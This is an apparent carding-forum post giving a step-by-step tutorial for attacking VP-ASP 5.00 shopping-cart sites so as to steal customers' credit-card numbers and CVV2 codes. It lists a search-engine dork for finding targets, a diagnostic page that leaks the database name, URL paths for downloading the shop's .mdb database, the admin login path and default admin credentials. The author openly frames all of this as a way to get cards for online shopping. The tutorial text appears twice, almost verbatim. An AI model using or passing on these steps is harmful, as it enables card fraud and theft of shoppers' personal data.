johnnyfresh
RIPPER
- Messages
- 5
- Reaction score
- 0
- Points
- 1
This method is use for testing the knowledge or for getting the credit card for shopping on internet or for fun or any way but not for cashing ( bcoz this method dont give PIN - 4 digit passcode ) only give cc numb , cvv2 and other basic info.
SHOPADMINS ARE OF DIFFERENT COMPANIES LIKE : VP-ASP , X CART .. ETC ETC. I M POSTING TUTORIAL FOR HACKING VP-ASP SHOP.
i hope u seen on internet whenever u try to buy some thing on internet with cc they show u a well programmed form very secure, they r carts .. like vp-asp xcarts .. specific sites are not hacked but carts are hack.. below i m posting tutorial to hack VP ASP cart. now every site which use that cart can be hacked and through their *mdb file u can get their clients ' credit card details ' and also login name and password of their admin area. and all other info of clients and comapny secrets.
HERE WE GO ...
*-*-*-*-*-*-*-*-*
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites hmmm, Good Q.
Finding VP-ASP 5.00 sites is so simple...
Go to google.com
and type.
intitle: VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
the page will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this>
****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
continue 04/02/2005 22:53
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at
download.com Or use MS Office Access.
inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.
the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp
if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb
file at all then try to find the admin login page and enter the default passwords which are
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
YOU LIKE THIS REP +1
SHOPADMINS ARE OF DIFFERENT COMPANIES LIKE : VP-ASP , X CART .. ETC ETC. I M POSTING TUTORIAL FOR HACKING VP-ASP SHOP.
i hope u seen on internet whenever u try to buy some thing on internet with cc they show u a well programmed form very secure, they r carts .. like vp-asp xcarts .. specific sites are not hacked but carts are hack.. below i m posting tutorial to hack VP ASP cart. now every site which use that cart can be hacked and through their *mdb file u can get their clients ' credit card details ' and also login name and password of their admin area. and all other info of clients and comapny secrets.
HERE WE GO ...
*-*-*-*-*-*-*-*-*
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites hmmm, Good Q.
Finding VP-ASP 5.00 sites is so simple...
Go to google.com
and type.
intitle: VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
the page will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this>
****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
continue 04/02/2005 22:53
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at
download.com Or use MS Office Access.
inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.
the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp
if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb
file at all then try to find the admin login page and enter the default passwords which are
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
YOU LIKE THIS REP +1
Let`s see u people think!That will be new for 50% of u.
